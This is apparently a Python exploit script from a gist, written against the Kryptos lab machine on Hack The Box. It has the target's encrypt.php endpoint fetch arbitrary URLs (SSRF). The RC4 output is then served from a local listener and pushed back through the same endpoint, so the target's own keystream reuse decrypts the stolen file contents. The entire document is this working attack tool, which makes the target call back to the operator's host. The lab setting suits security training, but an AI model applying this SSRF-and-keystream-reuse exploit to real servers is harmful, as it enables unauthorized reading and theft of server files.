@xct
Created Apr 28, 2019
Gets files via SSRF using the target's encrypt functionality: the RC4 output is served back to the target and run through the same endpoint again, which recovers the plaintext.
from base64 import *
import requests
import re
import argparse
import tempfile
import threading
import os
import urllib.parse
from http.server import HTTPServer, SimpleHTTPRequestHandler
# Base URL of the Kryptos target; every request below is built from it.
kryptos = "http://10.10.10.129/"

# Route plain-http traffic through a local interception proxy on
# 127.0.0.1:8080 so each SSRF request can be inspected. NOTE: every request
# fails with a ProxyError if nothing is listening on that port.
proxyDict = dict(http="http://127.0.0.1:8080")
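def _encrypt_via_ssrf(url, sessid):
    """Ask the target's encrypt.php to fetch *url* and RC4-encrypt it.

    The endpoint fetches the URL server-side (this is the SSRF primitive), so
    *url* may point at resources only the target can reach, including the
    attacker's own listener.

    Returns the base64-decoded encrypted bytes, or None when the response
    contains no ``"output">...<`` element (wrong session, fetch failure, ...).
    """
    cookies = {"PHPSESSID": sessid}
    params = (("cipher", "RC4"), ("url", url))
    # verify=False only matters if `kryptos` ever becomes an https:// URL;
    # proxies=proxyDict sends the request through the interception proxy
    # configured at the top of the file, so nothing works without it listening.
    r = requests.get(
        kryptos + "encrypt.php",
        params=params,
        cookies=cookies,
        proxies=proxyDict,
        verify=False,
    )
    m = re.search(r'"output">(.+)<', r.text)
    if not m:
        return None
    return b64decode(m.group(1))


def get(url, ip, port, sessid):
    """Retrieve *url* through the target's SSRF and print its plaintext.

    Two round trips: (1) encrypt.php fetches *url* and returns it RC4-encrypted;
    (2) that ciphertext is served from a throwaway HTTP listener on ip:port and
    fed back into encrypt.php. RC4 is a XOR stream cipher and the server
    evidently applies the same keystream to every request, so encrypting the
    ciphertext a second time yields the original plaintext, which is printed
    (decoded as UTF-8 when possible, raw bytes otherwise).

    Args:
        url: URL the target should fetch server-side.
        ip: address the target can reach this host on; the listener binds here.
        port: listener port (string or int; converted with int()).
        sessid: valid PHPSESSID cookie value for the target.

    Returns:
        "[*] Done" once both requests were attempted, or
        "Error getting encrypted file" when the first request yields no output.

    The listener is shut down and closed, and the working directory restored,
    on every path -- the original leaked the server on the early return.
    """
    cwd = os.getcwd()
    with tempfile.TemporaryDirectory() as tmpdir:
        # SimpleHTTPRequestHandler serves the *whole* current directory to
        # anyone who connects, so we serve from an empty scratch dir that only
        # ever contains the ciphertext file.
        server = HTTPServer((ip, int(port)), SimpleHTTPRequestHandler)
        thread = threading.Thread(target=server.serve_forever)
        thread.daemon = True
        thread.start()
        try:
            os.chdir(tmpdir)
            ciphertext = _encrypt_via_ssrf(url, sessid)
            if ciphertext is None:
                return "Error getting encrypted file"
            print("[+] Got encrypted result")
            with open("tmp", "wb") as f:
                f.write(ciphertext)
            print("[*] Size: " + str(os.path.getsize("tmp")))

            # Second pass: make the target fetch our ciphertext and "encrypt"
            # it again with the same keystream, which undoes the first pass.
            plaintext = _encrypt_via_ssrf(
                "http://" + ip + ":" + str(port) + "/tmp", sessid
            )
            if plaintext is None:
                print("[-] Failed decrypting..")
            else:
                print("[+] Decrypted:")
                try:
                    print(plaintext.decode("utf-8"))
                except UnicodeDecodeError:
                    # Binary file (or still-garbled data): show the raw bytes.
                    print(plaintext)
        finally:
            # Always stop the listener and leave the scratch dir before it is
            # deleted; chdir back first so cleanup does not remove our cwd.
            server.shutdown()
            server.server_close()
            os.chdir(cwd)
    return "[*] Done"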
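if __name__ == "__main__":
    # The target URL and the interception proxy live at the top of the file;
    # everything else is taken from the command line.
    parser = argparse.ArgumentParser(
        description=(
            "retrieves files and executes limited commands on kryptos @ "
            "hackthebox (you must adjust the target url and proxy at the top "
            "of this script)"
        )
    )
    parser.add_argument("method", help="get, getphp, exec")
    parser.add_argument(
        "ip", help="address the target can reach this host on (listener bind address)"
    )
    parser.add_argument("port", help="listener port")
    parser.add_argument("phpsessid", help="valid PHPSESSID cookie value for the target")
    parser.add_argument("url", help="URL the target should fetch server-side")
    args = parser.parse_args()
    if args.method == "get":
        print(get(args.url, args.ip, args.port, args.phpsessid))
    else:
        # Only 'get' is implemented in this revision; fail loudly instead of
        # exiting silently with status 0 for 'getphp' / 'exec'.
        parser.error("method %r is not implemented here; only 'get' is" % args.method)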